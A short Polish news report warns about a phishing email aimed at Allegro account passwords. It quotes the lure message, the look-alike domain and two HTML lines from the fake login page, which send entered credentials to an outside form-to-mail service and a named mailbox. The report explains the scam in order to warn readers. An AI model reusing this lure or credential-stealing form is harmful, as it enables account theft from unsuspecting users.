Próba wyłudzenia haseł do Allegro
Jak informuje jedna z użytkowniczek grupy usenetowej alt.pl.allegro, w sieci pojawił się spam typu phisherskiego mający na celu wyłudzenie haseł do kont Allegro.
reklama
Ujawniony przez użytkowniczkę o nicku MarylkA e-mail wysłany przez oszusta (lub oszustów) ma dość prostą formę:
Twoje konto w allegro.pl zostało dodane do listy ukradzionych. Prosze zalogować się na stronie podanej poniżej w celu sprawdzenia wiarygodności zgłoszenia tego poprzez innego użytkownika allegro.pl
www.allegro.serwus.pl
Jacek Kowalski,
Dział od spraw użytkownika.
Teoretycznie już na pierwszy rzut oka widać, iż wskazany adres znajduje się poza domeną Allegro. Jeśli jednak ktoś mimo wszystko wejdzie pod wskazany adres napotka stronę bliźniaczo podobną do strony logowania do Allegro. Wizualnie różnią się one tylko dwoma szczegółami: innym przyciskiem "zaloguj się" oraz brakiem linku przełączającego pomiędzy logowaniem standardowym i bezpiecznym (SSL).
Sam kod różni sie jednak w jeszcze jednym punkcie. Formularz zawiera bowiem linie:
<form method="POST" action="http://free4web.pl/Form2Mail/">
<input type="hidden" name="email" value="keyyyyylogg@o2.pl">
Tak więc jeśli ktoś będzie na tyle nieostrożny, iż wprowadzi swoje dane do fałszywego formularza, powędrują one w zupełnie inne miejsce, zaś sama strona wyświetli podrobiony komunikat błędu.